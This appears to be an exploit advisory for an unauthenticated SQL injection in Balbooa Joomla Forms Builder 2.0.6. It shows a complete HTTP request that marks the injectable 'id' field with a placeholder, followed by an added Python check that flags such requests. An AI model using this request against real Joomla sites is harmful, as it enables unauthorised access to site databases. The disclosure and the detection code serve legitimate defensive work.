Balbooa Joomla Forms Builder 2.0.6 Exploit, SQL Injection (Unauthenticated)

# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
# Date: 24.10.2021
# Exploit Author: blockomat2100
# Vendor Homepage: https://www.balbooa.com/
# Version: 2.0.6
# Tested on: Docker

An example request that triggers the SQL injection. The SQLI placeholder in the "id" value of the JSON form part marks the injection point:

POST /index.php?option=com_baforms HTTP/1.1
Host: localhost
Content-Length: 862
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035
Connection: close

------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="1"

{"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="form-id"

1
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="task"

form.message
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="submit-btn"

2
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-title"

Home
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-url"

http://localhost/
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-id"

0
------WebKitFormBoundaryTAak6w3vHUykgInT--
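
A request-side check for the shape shown above, as an added example that is not part of the original advisory or the vendor's code: it parses the multipart body of a com_baforms form.message request and reports every identifier field in the JSON part that is not an integer. The NUMERIC_KEYS list, the integer-only rule and all function names are assumptions made for illustration; the sample body is constructed from the request above.

```python
import json
import re
from email import message_from_bytes
from email.policy import HTTP

# Assumption: a legitimate client only ever sends integers in these JSON keys.
NUMERIC_KEYS = ("submission_id", "form_id", "field_id", "id")
INT_RE = re.compile(r"\d{1,18}")

def multipart_fields(content_type, body):
    """Parse a multipart/form-data body into {part name: text value}."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    fields = {}
    for part in message_from_bytes(raw, policy=HTTP).iter_parts():
        name = part.get_param("name", header="content-disposition")
        fields[name] = part.get_payload(decode=True).decode("utf-8", "replace").strip()
    return fields

def is_int_like(value):
    # type() check excludes bool; strings must consist of digits only.
    return type(value) is int or (isinstance(value, str) and bool(INT_RE.fullmatch(value)))

def check_baforms_request(query, content_type, body):
    """Return (part, key, value) for each non-integer identifier; [] means clean."""
    fields = multipart_fields(content_type, body)
    if "option=com_baforms" not in query or fields.get("task") != "form.message":
        return []
    findings = []
    for part_name, text in fields.items():
        try:
            doc = json.loads(text)
        except ValueError:
            continue  # plain form values such as "Home" are not JSON
        entries = [e for e in doc.values() if isinstance(e, dict)] if isinstance(doc, dict) else []
        for entry in entries:
            for key in NUMERIC_KEYS:
                if key in entry and not is_int_like(entry[key]):
                    findings.append((part_name, key, entry[key]))
    return findings

# Constructed sample: the request above reduced to the two parts the check reads.
CTYPE = "multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT"
def sample_body(id_value):
    b = "------WebKitFormBoundaryTAak6w3vHUykgInT"
    doc = json.dumps({"1": {"submission_id": 0, "form_id": 1, "field_id": 1, "id": id_value}})
    parts = [("1", doc), ("task", "form.message")]
    out = "".join(f'{b}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n' for n, v in parts)
    return (out + b + "--\r\n").encode()
```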
